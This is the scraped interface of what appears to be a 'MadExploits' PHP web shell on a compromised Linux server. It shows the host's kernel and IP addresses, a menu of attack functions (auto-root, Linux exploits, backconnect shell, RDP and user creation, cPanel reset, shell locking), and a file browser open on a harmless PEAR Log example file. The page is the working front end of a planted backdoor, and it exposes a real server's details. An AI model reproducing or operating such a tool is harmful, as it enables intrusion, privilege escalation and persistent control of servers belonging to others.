Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.75.238
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
cpanel-php81-log-1.13.3 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
composite.php
305
B
-rw-r--r--
console.php
149
B
-rw-r--r--
display.php
280
B
-rw-r--r--
error_log.php
169
B
-rw-r--r--
file.php
216
B
-rw-r--r--
firebug.php
270
B
-rw-r--r--
mail.php
226
B
-rw-r--r--
null.php
133
B
-rw-r--r--
observer_mail.php
655
B
-rw-r--r--
pear_error_handler.php
620
B
-rw-r--r--
php_error_handler.php
768
B
-rw-r--r--
sql.php
220
B
-rw-r--r--
sqlite.php
489
B
-rw-r--r--
syslog.php
156
B
-rw-r--r--
win.php
208
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : observer_mail.php
<?php require_once 'Log/observer.php'; class Log_observer_mail extends Log_observer { var $_to = ''; var $_subject = ''; var $_pattern = ''; function Log_observer_mail($priority, $conf) { /* Call the base class constructor. */ $this->Log_observer($priority); /* Configure the observer. */ $this->_to = $conf['to']; $this->_subject = $conf['subject']; $this->_pattern = $conf['pattern']; } function notify($event) { if (preg_match($this->_pattern, $event['message']) != 0) { mail($this->_to, $this->_subject, $event['message']); } } } ?>
Close